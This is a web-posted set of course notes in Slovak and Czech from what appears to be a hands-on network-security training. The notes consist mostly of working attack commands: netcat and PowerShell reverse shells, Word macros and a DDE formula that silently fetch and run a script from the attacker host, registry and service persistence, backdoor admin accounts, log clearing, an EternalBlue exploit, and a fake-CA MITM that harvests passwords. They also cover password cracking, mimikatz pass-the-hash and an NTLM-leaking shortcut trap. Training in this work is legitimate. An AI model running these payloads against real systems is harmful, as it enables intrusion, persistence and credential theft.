Detail Article: GOC3 - Sitova bezpecnost

GOC3 - Sitova bezpecnost

Zaujimave linky pouzite na skoleni

archive web

http://web.archive.org/

Zranitelnosti na mojej URL

https://www.shodan.io/host/46.36.36.173

Podkasty

https://ceskepodcasty.cz/podcast/cyber-rangers-podcast

MITRE ATT&CK je obrovská verejná databáza všetkých známych techník, ktoré útočníci používajú pri kybernetických útokoch – od prvého prieniku do siete až po krádež dát či zničenie systému.

https://attack.mitre.org/

https://smlouvy.gov.cz/

Spoofovanie cisel

Protect Your Privacy | SpoofCard

kiniha

https://www.nejlevnejsi-knihy.cz/kniha/linux-basics-for-hackers-2nd-edition_44208743.html?gad_source=1&gad_campaignid=864730554&gbraid=0AAAAADs5Kv02rAH89API4cz1CVOY8je1Z&gclid=EAIaIQobChMI7euF3-HqkwMVpLGDBx09yx1AEAQYAiABEgJzm_D_BwE

IPS/IDS

https://www.google.com/search?sca_esv=1e08b7a829cec058&rlz=1C1GCEA_enCZ1209&udm=2&fbs=ADc_l-ZseckkBJUFopaGDNYa-HGjo4_b6b_a7pIHTL5Y9QnExg6xJqXbG7aOLcH8CWqOtkxIZKBNJnq_i8SODvYOcUN7kTVgi60T0FwAbXVLHBvO3riBu9oL4e1tvrxm9BzpwVRFSChlGef3PR90KWCpwS1Xn4SlU853rxhfY8m1ZPgAUEJEcTxCHZXSGm7pR_xlpDe4OCiM&q=ips+ids&sa=X&sqi=2&ved=2ahUKEwi_2v_Atu-TAxUfh_0HHXXWIiYQtKgLegQIHBAB&biw=2318&bih=925&dpr=1#sv=CAMSVhoyKhBlLVpCSkY5RXJkQjZadG5NMg5aQkpGOUVyZEI2WnRuTToOTnI3WkJBN0FyeGRQYk0gBCocCgZtb3NhaWMSEGUtWkJKRjlFcmRCNlp0bk0YADABGAcgj9Wx_QdKCBABGAEgASgB

Laby

GOC3

Good Commands

Nmap

ping na celu sitet

nmap -sn 192.168.56.0/24

scan portov na celu siet

nmap -T4 192.168.56.0/24

NetCat - reverse cmd

server : attacker

nc -lvvp 443

clinet : victim

C:\Users\Student\Desktop\Tools\netcat-win32-1.12>nc64.exe 1.2.3.170 443 -e cmd

tools in kali:

msfconsole

msfconsole (list of tools)
use exploit/multi/handler (reverse cmd server)
- set LHOST 1.2.3.170
- set LPORT 443
- set exitonsession false
- show options
- help

Maskovanie skriptou:

Obfuskace

poggoglit

metasploit .. toolbox na zranitelnosti

Cool Tools

autoruns: https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns

can scan with virustotal in options

process explorer: https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

can scan with virustotal in options

process monitor: https://learn.microsoft.com/en-us/sysinternals/downloads/procmon

NETDISCOVER

pouziti aktivni arp sken netdiscover:

netdiscover -i eth1 -r 192.168.56.0/24

pasivny discover

netdiscover -i eth1 -r 192.168.56.0/24 -p

NMAP

aktivni arp sken nmap

nmap -sn -PR 192.168.56.0/24

nmap -sn -PR 192.168.56.0/24 | grep "Nmap scan report" | awk '{print $5}'

SKEN NA CIZI sit

nmap -sn 10.2.132.0/24 -T5

nmap -sn 10.2.132.0/24 -T5 -PS445,135,3389

nmap -sn 10.2.132.0/24 -T5 -PS445,135,3389 -oG - | awk '/Up$/{print $2}' > live_hosts.txt

nmap -sT -iL live_hosts.txt -T5 -Pn -p 80,443,3389,5985,445,21,88 --disable-arp-ping

netbios

nbtscan -r 192.168.1.0/24

TYPY UTOKOV

BORDEL

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md

C:\Users\Student\AppData\Local\Temp\keylogger.txt

Práce s kalim

Kali survival kit

ssh kali@192.168.56.170

ssh-keygen -lf /etc/ssh/ssh_host_ecdsa_key.pub

scp soubor.txt kali@192.168.56.170:/home/kali

Prenos na web kaliho

service apache2 start

cd /home/kali

cp procesy.txt /var/www/html

Dostupne pres ka.cz/nazevsouboru

Prezentace

netstat -ano | findstr -i estab

Initial access, execution

NETCAT

windows

nc64.exe 1.2.3.170 443 -e cmd

kali

nc –lvvp 443

POWERSHELL reverse shell zakladni pusteni

start powershell.exe E:\tools\Invoke-PowerShellTcp.ps1

Neviditelne okno + EXEC bypass

Start powershell.exe -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -File E:\tools\Invoke-PowerShellTcp.ps1"

BATAK

rundll32 url.dll,FileProtocolHandler https://www.youtube.com/watch?v=wPXOJg7QbXE & powershell.exe -windowstyle hidden -executionpolicy bypass "e:\invoke-powershellTcp.ps1"

Macro, které spouští skript z PC

Private Sub Document_Open()

'az se otevre dokument'

MsgBox ("k sapu se nepodarilo pripojit, zkuste to pozdeji")

Call Shell("powershell.exe -windowstyle hidden -executionpolicy bypass E:\invoke-powershellTcp.ps1", vbMaximizedFocus)

End Sub

Macro, které si samo stáhne skript z FILE SERVERU a spustí ho v RAM

C2
443
HTTP FILE SERVER 80
INVOKE-POWERSHELLTCP.PS1
PS
CL RAM
+
WORD

uprava makra

Private Sub Document_Open()

'az se otevre dokument'

MsgBox ("k sapu se nepodarilo pripojit, zkuste to pozdeji")

Call Shell("powershell.exe -windowstyle hidden -executionpolicy bypass iex(iwr -usebasicparsing http://1.2.3.170/invoke-powershellTcp.ps1)", vbMaximizedFocus)

End Sub

nahrani sobouru na web server utocnika

scp E:\TOOLS\Invoke-PowerShellTcp.ps1 kali@1.2.3.170:/home/kali

cp /home/kali/Invoke-PowerShellTcp.ps1 /var/www/html

Makro odpal

Private Sub Document_Open()

'az se otevre dokument'

MsgBox ("k sapu se nepodarilo pripojit, zkuste to pozdeji")

Call Shell("powershell.exe -windowstyle hidden -executionpolicy bypass iex(iwr -usebasicparsing http://1.2.3.170/Invoke-PowerShellTcp.ps1)", vbMaximizedFocus)

End Sub

UKOL

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v MyScript /t REG_SZ /d "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File \"E:\TOOLS\aaa.ps1\"" /f

PERSISTENCE A odpal

Private Sub Document_Open()

'az se otevre dokument'

MsgBox ("k sapu se nepodarilo pripojit, zkuste to pozdeji")

Dim cmdReg As String

Dim cmdExec As String

Dim psPayload As String

' Tvuj overený príkaz pro registr

cmdReg = "cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run " & _

"/f /v updateprintconnect /t REG_EXPAND_SZ /d ""powershell.exe -windowstyle hidden iex(iwr -usebasicparsing http://1.2.3.170/Invoke-PowerShellTcp.ps1)"""

' Samotný PowerShell kód pro okamžité spuštení

psPayload = "powershell.exe -windowstyle hidden -ExecutionPolicy Bypass iex(iwr -usebasicparsing http://1.2.3.170/Invoke-PowerShellTcp.ps1)"

' 1. Zapíše do registru (Persistence)

Call Shell(cmdReg, vbHide)

' 2. Okamžite spustí (Execution)

Call Shell(psPayload, vbHide)

End Sub

DDE

=cmd|'/c start /MIN powershell -windowstyle hidden "iex(iwr -usebasicparsing http://1.2.3.170/Invoke-PowerShellTcp.ps1)"'!A0

Powershell security

https://wug.cz/zaznamy/572-WUG-Days-2019-Windows-PowerShell-Security

$ExecutionContext.SessionState.LanguageMode

Obfuskace

install-module ps2exe

ps2exe E:\Invoke-PowerShellTcp.ps1

Invoke-Obfuscation

OpenWindowsPowerShellasadministrator
OpenWindOWSPowerShell

import-module .\Invoke-Obfuscation.psd1

Invoke-Obfuscation

Help

set scriptpath E:\Invoke-powershelltcp.ps1

STRING

encoding

clip

Persistence

$Managing startup programs Add legagy app to startup program -> place shortcut into For all users: (32-bit Apø For user' sign in H KCU\Software\Microsoft\\Nindows\CurrentVersion\Run NT\CurrentVersion\VVindows\Run NT\CurrentVersion\VVindows Scheduled tasks Win.ini (32bit OS poly)$

$Managing startup programs RunOnce and RunOnceEx keys: H rrentVersion\R u n Once LAB: Which run only once a which run notepad once by WINLOGON (under control OS, can run program) o HKLM\Software\Microsoft\Windows o HKLM\Software\Microsoft\Windows Group or HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run !Modern apps can programmatically configure themselves to run at startup and can also run utility apps that are installed along with the app package$

Procesy teorie

$Machine generated alternative text: Task Manager File Options View Processes Performance C: c host. ex e App history Startup SecurityHeaIthServic... SecurityHeaIthSystra... servłces.exe Sgrm8roker.exe ShellExperienceHost.... sihost.exe r SkypeApp.exe - Skype8ackgroundH... smss.exe SMSvcHost.exe SMSvcHost.exe spoolsv.exe srvany.exe = StartMenuExperienc... svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe • svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe • svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe 8832 88Cu4 I DDB 4896 5308 7984 7952 3620 4C48 3208 3460 6948 83Cu4 7868 7536 7084 3468 6920 1148 1220 13N 1344 1352 1364 1480 1524 1 340 1 368 1632 Status Running Running Running Running Suspended Running Suspended Suspended Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Running Users Details User name Student Student Student Student Student LOCAL SE... LOCAL SE... Student Student NEW,'ORK... NEW,'ORK... LOCAL SE... LOCAL SE... LOCAL SE... LOCAL SE... LOCAL SE... Se Nices CPU Memory (a... 3196K 1,436K 3388 K 6076K 276 K 6268 K 7,980K 5,836K 384 K 24,000 K 1,308K 936 K 1,132K 3636 K 1,576K 336 K 10,608K 9,328K 3332 K 70000 K 852 K S212K 1,712K 1,496K 2324 K 1,188K 1,868K 1,036 K 1,420K 11,8ĽK Image path name C: .exe cw5nI h2txyewy\SheIIExperienceHost.exe x64_kzf8qxf38zg5c\SkypeApp.exe C: ex e C: in dows\ Micr os aft. F ram ew ork64\v403031 Y\SMSv cHost. ex e Communication Foundation\SMSvcHost.exe C: exe C: in dows\Syst C: in dows\Syst C: in dows\Syst C: in dows\Syst C: in dows\Syst C: in dows\Syst cw5nI h2txyewy\StartMenuExperie... m32\svchost.exe m32\svchost.exe m32\svchost.exe m32\svchost.exe m32\svchost.exe m32\svchost.exe C: in dows\Syste m32\svchost .ex e C: in dows\Syste m32\svchost .ex e UAC virtual... Not allowed Disabled Not allowed Not allowed Disabled Disabled Disabled Disabled Not allowed Not allowed Not allowed Not allowed Not allowed Disabled Not allowed Not allowed Not allowed Not allowed Not allowed Disabled Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed Not allowed$

Privilege escalation

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v

Set-executionpolicy bypass –scope process

. .\PowerUp.ps1

Invoke-AllChecks

Write-servicebinary –name "gopassvc" -path "C:\Program Files\stupidservice\blbe.exe"

Privilege escalation 2

KrbRelayUp.exe Full --Method RBCD --createNewComputerAccount

--computername UTOCNIK --ComputerPassword "Password123!" --impersonate dajdou

https://github.com/Dec0ne/KrbRelayUp

Sluzby teorie

echo "ahoj" > C:\WINDOWS

sc create ipv6updatesvc start= auto binpath= "cmd /c net user /add backdoor Password123 && net localgroup administrators backdoor /add"

sc start ipv6updatesvc

$C: \WINDOWS\system32>sc config spooler binpath= bat & C: . exe" [SC] ChangeServiceConfig SUCCESS "cmd / c start D: \ukollsession.$

Persistence – obejiti UAC

sc.exe create zlo start= auto binpath= "cmd /c wevtutil cl security"

sc.exe create "UpdateCheck" start= auto binPath= "cmd /c powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient).DownloadString('http://1.2.3.170/Invoke-PowerShellTcp.ps1')\""

sc.exe \\server12 create zlo start= auto binpath= "cmd /c wevtutil cl security"

Audit sluzeb

Get-WmiObject win32_service | Format-Table -Wrap -AutoSize -Property State,Name,PathName | out-file C:\servicelist.txt

Sluzby guidance pro windows servery:

https://learn.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server

LABY 2

Sken zivych zarizeni

manualove stranky

man netdiscover

pouziti aktivni arp sken netdiscover:

netdiscover -i eth1 -r 192.168.56.0/24

pro overeni range

ip a

aktivni arp sken nmap

nmap -sn -PR 192.168.56.0/24

nmap -sn -PR 192.168.56.0/24 | grep "Nmap scan report" | awk '{print $5}'

pasivni arp sken:

netdiscover -i eth1 -r 192.168.56.0/24

SKEN NA CIZI sit

nmap -sn 10.2.132.0/24 -T5

nmap -sn 10.2.132.0/24 -T5 -PS445,135,3389

nmap -sn 10.2.132.0/24 -T5 -PS445,135,3389 -oG - | awk '/Up$/{print $2}' > live_hosts.txt

cat live_hosts.txt

Sken portu – zkoumam zive

agresivnejsi

nmap -iL live_hosts.txt -T5 -Pn -p 80,443,3389,5985,445,21,88

plny sken

nmap -sT -iL live_hosts.txt -T5 -Pn -p 80,443,3389,5985,445,21,88

CAST 2

SKEN ZIVYCH IP

nmap -sn -PR 192.168.56.0/24 | grep "Nmap scan report" | awk '{print $5}' > live_hosts.txt

SPATNE

nmap -sT 192.168.56.0/24

PLNY SKEN

nmap -sT -iL live_hosts.txt -T5 -Pn -p 80,443,3389,5985,445,21,88 --disable-arp-ping

overeni OS

nmap -iL livehosts.txt -O

netbios

nbtscan -r 192.168.56.0/24

LDAP

ldapsearch -x -H "ldap://192.168.56.12" -D "bfu@nakoleni.cz" -W -b "dc=nakoleni,dc=cz" "(objectClass=computer)" sAMAccountName dNSHostName operatingSystem

Vyhledavani zranitelnosti

nmap --script-updatedb

nmap --script vuln 192.168.56.12

Exploit priprava

msfconsole

search CVE-2017-0143

use 2

najiti nejaky dobry payload

search payload

payload/windows/x64/shell/reverse_tcp

konfigurace

show options

set rhost 192.168.56.12

exploit pripadne run

pro hozeni na background

CTRL + Z

VYPIS SESSIONS

sessions

pripojeni k session

sessions -i 1

https://www.offsec.com/metasploit-unleashed/meterpreter-basics/

upload live_hosts.txt C:\\WINDOWS\\system32

shell

whoami

sc create privitani binpath= "cmd /c cmd" start= auto

sc start privitani

LABY 3

MAN IN THE MIDDLE

arpspoof -i eth1 -t 192.168.56.12 192.168.56.10 -r

-t koho budu travit posledni ip - za koho se vydavam

arpspoof -i eth1 -t 192.168.56.10 192.168.56.12

ping 192.168.56.10 z w12

ping 192.168.56.12 z w10f

na kali:

cat /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

pozn. mela by tam byt jednicka

na kali:

tcpdump -i eth1 tcp port 445 -w pokus.cap

Get-smbshare

Get-smbshare | fl name,encryptdata

Set-smbshare userdocs -encryptdata $true

LABY4

nezasifrovany disk

https://www.youtube.com/watch?v=43nmaD3G7k8

1 CVICENI - UTILMAN

1. RESET A NABOOTOVANI MEDIA

2. SHIFT + F10

3. BCDEDIT

4. D:

5. CD WINDOWS\SYSTEM32

6. COPY utilman.exe utilzal.exe

7. COPY cmd.exe utilman.exe

$o.s. root@kali: X v GOC3 x Počítačová škola GOPAS x @ ChatGPT × | + X 192.168.56.254 is-at 0:11:11:11:11:11 ... 0 € 2. osmera-my.sharepoint.com/personal/lubomir_osmera_tech/_layouts/15/Doc.aspx?sourcedoc={d2982 ... 0 w10f [Running] - Oracle VM VirtualBox File Machine View Input Devices Help GOC3 v Přispěvatel typu host 0 [Det. C:\WINDOWS\system32\utilman.exe The system cannot find message text for message number 0x2350 in the message File Home Insert Draw View Help Q Tell me what you want to do Editing V BIUAVAV ... > Q V 19(c) Microsoft Corporation. All rights reserved. 9v0v Not enough memory resources are available to process this command. GOC3 Laby4 1C: \WINDOWS\system32>whoami + Add section + Add page a středa 15. dubna 2026 13:56 ont authority \system Computer Management Poznamky ke kurzu Hesla File Action View Help 1ºC: \WINDOWS\system32>compmgmt.msc Uvod nezasifrovany disk Computer Management (Local Name Utoky na endpoint C : \WINDOWS \system32> v " System Tools 11 System Tools + Task Scheduler Storage Man in the middle https://www.youtube.com/watch?v=43nmaD3G7k8 & Event Viewer Shared Folders To Services and Applications Lamani hesel Local Users and Groups 1 CVICENI - UTILMAN Performance Laby Device Manager 1. RESET A NABOOTOVANI MEDIA Storage Laby2 2. SHIFT + F10 ' Disk Management 3. BCDEDIT 1 Services and Applications Laby3 4. D: 5. CD WINDOWS\SYSTEM32 an Laby4 6. COPY utilman.exe utilzal.exe S Laby5 - falesne certifikaty D 7. COPY cmd.exe utilman.exe Wireshark 41 B Algoritmy - kvantova od ... /r Wifi 1 Mimikatz - Isass fork ar Multi handler as to odkaz 54 tipy Změnit chování OS na AB disku úpravou root@ kali)-[~] monate Windows registru služby Settings to activate Windows. # V O Type here to search O P3 NT CES 3:56 PM 4/15/2026$

Změnit chování OS na disku úpravou registru služby spooler (spouštění calc.exe nebo nc.exe namísto původního spoolsv.exe)

⦁ Spusťte regedit

⦁ Rozbalte HKLM

⦁ !!!POZOR!!! – klíče, které vidíte v HKLM nepatří OS na disku, ale jsou to klíče miniaturního OS prostředí Windows PE

⦁ Načtěte registr SYSTEM ze složky D:\Windows\System32\ příkazem

reg load HKLM\CS D:\Windows\System32\config\SYSTEM

⦁ V regeditu rozbalte HKLM\CS

⦁ Cokoli zde změníte ovlivní chování OS na disku (kdokoli s fyzickým přístupem může totálně změnit konfiguraci služeb nebo ovladačů)

Pokud byste potřebovali resetovat heslo libovolného lokálního uživatele, stačilo by do hodnoty ImagePath vložit např.: cmd.exe /c net user uživatel novéheslo nebo pro vytvoření nového lokálního účtu vložit:

cmd.exe /c net user novýuživatel novéheslo /add & net localgroup

administrators novýuživatel /add

Vyzkoušejte tento krok (vytvoření uživatele/změnu hesla) - nezapomeňte však vždy korektně odpojit (uzavřít) registry podle následujícího postupu. Vždy používejte komplexní heslo (velká, malá, číslice, speciální znaky), protože změna stale podléhá politice hesel.

⦁ Uzavřete celou načtenou větev HKLM\CS a zavřete regedit

⦁ Odpojte načtený registr HKLM\CS příkazem:

reg unload HKLM\CS

⦁ Otevřete regedit a zkontrolujte, že se odpojila větev HKLM\CS (že neexistuje)

Restartujte počítač do klasického OS na disku – stačí zavřít všechna okna ve WinPE. Po restartu zkontrolujte, že došlo k vytvoření nového usera a tento user je ve skupině administrators

LABY5

openssl genrsa -out ca.key 2048

openssl req -new -x509 -days 3650 -key ca.key -out ca.crt

VeriSign Class 4 Public Primary Certification Authority - G6

kopie na apache

cp ca.crt /var/www/html

uprava zleho souboru pro autoinstalaci

curl -o E:\ca.crt http://ka.cz/ca.crt

cely

rundll32 url.dll,FileProtocolHandler https://www.youtube.com/watch?v=wPXOJg7QbXE & cmd /c "curl -o D:\ca.crt http://ka.cz/ca.crt && certutil -f -addstore root D:\ca.crt"

Distribuce certifikátu

- socialni inzenyrstvi

- past v podobe exe, makra, skriptu apod.

MTM

STAT BUDEME MEZI GATEWAYI A W10F (popr. win10)

arpspoof -i eth1 -t 192.168.56.254 192.168.56.10 -r

zkontrolujme zapnuty routing

cat /proc/sys/net/ipv4/ip_forward

poznamka k poradi: -t koho budu travit posledni ip - za koho se vydavam

nasimulujte vstup na paypal a vyplneni hesla

-- vytvorime si proxy

sudo sslsplit -k ca.key -c ca.crt -l spojeni.log -S /root http 0.0.0.0 8080 https 0.0.0.0 8443

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8443

--vyhledame plaintexty v logach

grep -a --color "SuperSilne" /root/*.log

grep -a --color "nickname" /root/*.log

LABY 6

Kali:

arpspoof -i eth1 -t 192.168.56.19 192.168.56.10 -r

w10f

ping 192.168.56.19 z w10f

Tracert 192.168.56.19

arp –a --- u 192.168.56.19 je mac *17:17*

Pozn pokud ping nebezi, na kali:

cat /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

pozn. mela by tam byt jednicka

na kali:

tcpdump -i eth1 tcp port 445 or tcp port 80 -w pokus.cap

LABY 7

Fulltext hledani

Findstr /s /i "password" E\*.PS1 2>NUL

Spravce hesel

https://marektoth.cz/blog/dom-based-extension-clickjacking/

Clipboard.ps1

Start powershell.exe -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -File E:\tools\Invoke-PowerShellTcp.ps1"

Slovniky

Stahnout 100k most common passwords

Na miru:

Cupp -I

cupp -i

First Name: hugo

Surname: fantozzi

Nickname: puclik

Birthdate (DDMMYYYY): 01021950

Partners) name: pina

Partners) nickname: kraska

Partners) birthdate (DDMMYYYY): 03041970

Child's name: mariangela

Child's nickname: opicka

Child's birthdate (DDMMYYYY): 05062000

Pet's name: zeryk

Company name: mafioso

Do you want to add some key words about the victim? Y/[N]: y

Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: karbanatek,bagety,pizza,pivko,fotbal,repryza,ovladac,kolo,bibione,silvaniova

Do you want to add special chars at the end of words? Y/[N]: y

Do you want to add some random numbers at the end of words? Y/[N]:y

Leet mode? (i.e. leet = 1337) Y/[N]: y

2012 server

Fantozzi never expire

Net user lubomir superman /add

Utok 1 – online

nmap -Pn -sT 192.168.56.12

Medusa

Hydra

John-the-ripper

hydra -l fantozzi -P /home/kali/hugo.txt smb://192.168.56.12

Utok2 - responderoffline lamani

responder -I eth1

https://hashcat.net/wiki/

https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -m 5600 samotnahash -a 0 /home/kali/hugo.txt

hashcat -m 5600 samotnahashbigboss -a 3 ?a?a?a?a

Past2

$payload = @'

[InternetShortcut]

URL=https://portal.microsoft.com

WorkingDirectory=C:\

IconFile=\\192.168.56.170\%USERNAME%.icon

IconIndex=1

$file = '\\server12\userdocs\Microsoft 365 Portal.url'

Set-Content -Path $file -Value $payload -Encoding UTF8 -Force

past 3

https://www.youtube.com/watch?v=55FZLgj6zSo

rainbow tables part4

https://www.soom.cz/clanky/1165--Rainbow-tables-tajemstvi-zbavene

obrana - audit hesel

notepad slovnik.txt

Get-ADReplAccount -All -Server w19 -NamingContext "dc=nakoleni,dc=cz" |

Test-PasswordQuality -WeakPasswordsFile .\slovnik.txt -IncludeDisabledAccounts

zisk cistych hashi

. .\invoke-mimikatz.ps1

pozor u prikazu mimikatzu poradi

kradez hashe:

Invoke-mimikatz -command '"token::elevate" "sekurlsa::ekeys"'

pass the hash:

Invoke-mimikatz -command '"sekurlsa::pth /user:dajdou /domain:nakoleni.cz /rc4:hash /run:powershell"'

net user pokusny heslo123 /add /domain

4738

LABY 8

MTM

Kali:

192.168.56.10 192.168.56.19

1. zalozka terminalu - traveni

arpspoof -i eth1 -t 192.168.56.10 192.168.56.19 -r

2.Zalozka terminalu – kontrola traveni u forwardingu

cat /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

tcpdump -i eth1 tcp port 445 -w zachytntlm.cap

Vypublikiujeme na web apache

Cp zachyt.cap /var/www/html

Windows:

\\192.168.56.19\userdocs

Stahnout cap

Ka.cz/nazevsouboru

Network miner

Poskladame si do spravneho tvaru:

dajdou::NAKOLENI:91C8EE71CDD9FB8F:9587AD9903C7878E84E4053872832714:0101000000000000E9D4C9683BCEDC010705C98CC636CCCA00000000020010004E0041004B004F004C0045004E00490001000600570031003900040016004E0041004B004F004C0045004E0049002E0043005A0003001E005700310039002E004E0041004B004F004C0045004E0049002E0043005A00050016004E0041004B004F004C0045004E0049002E0043005A0007000800E9D4C9683BCEDC0106000400020000000800300030000000000000000100000000200000A366004A0DB839E2F55D3686AAF00E1742819179C5D951F384F0418408851F020A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E00350036002E00310039000000000000000000

Passwordless

Client generovani klice

Ssh-keygen

Kopie VK na server

mkdir .ssh

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDA0yd0/I0ZJ4EITWNNzFK3FchbVBrxGdptW9A32TZXtNZqFhsNWhznu4EMXWhDsjkkdzszc3Wr1T71feHtN+1tSSYOzehCFucKAWKktlHnTqccUtj9gvT9tesXN/UVazBVjpGpompkGYYCBhp/FQ51YYiElooHIvFuzELrQd6X7hpdHqWp3PSBnxNjfPeAoZRR2v2wQU8Hipw1FnfUmekzpt8JcqmzNHT70m9BYo7BtPy/yzahdqiHN7zEWOvHONesIclJ1pHsPB1BILNVSw5IEDgOsN8EwXzPahcJvaUT+o2nxHkLGH7csscyOv1wkusbKEFDdT9VVkqTV0QMOD5SoOLDTfUdwJjbT4JIOn30O7sNfIa2d2Sei9cgvE1KFmrzV9wbqCeji0Mxv9gsQ7RKA9WN2i1NAXVaKQA9qahsGwtwcUEGtXSMGkOWXtHfKXMMaWhv42KuQk1hyQNliTL0TIP/gmq9JnGHq+e4ry0Ewr8TQQFs0X6JEzbCsMORQ8k= student@LEKTORC02" > .ssh/authorized_keys

WIRESHARK

capture

tcp port 80

ip host 192.168.56.12

ether host <macovka>

Priklad

tcp port 80 or tcp port 443

display filtry

ip.addr == 192.168.56.3

tcp.port == 80

udp.port ==

http

dns

bootp

eth.addr== mac

FILTR

HTTP and ip.src==192.168.56.12

Komentáre ku článku

Zatiaľ žiadne komentáre.

GOC3 - Sitova bezpecnost

Zaujimave linky pouzite na skoleni

Good Commands

tools in kali:

poggoglit

Cool Tools

NETDISCOVER

NMAP

TYPY UTOKOV

Komentáre ku článku

Pridať komentár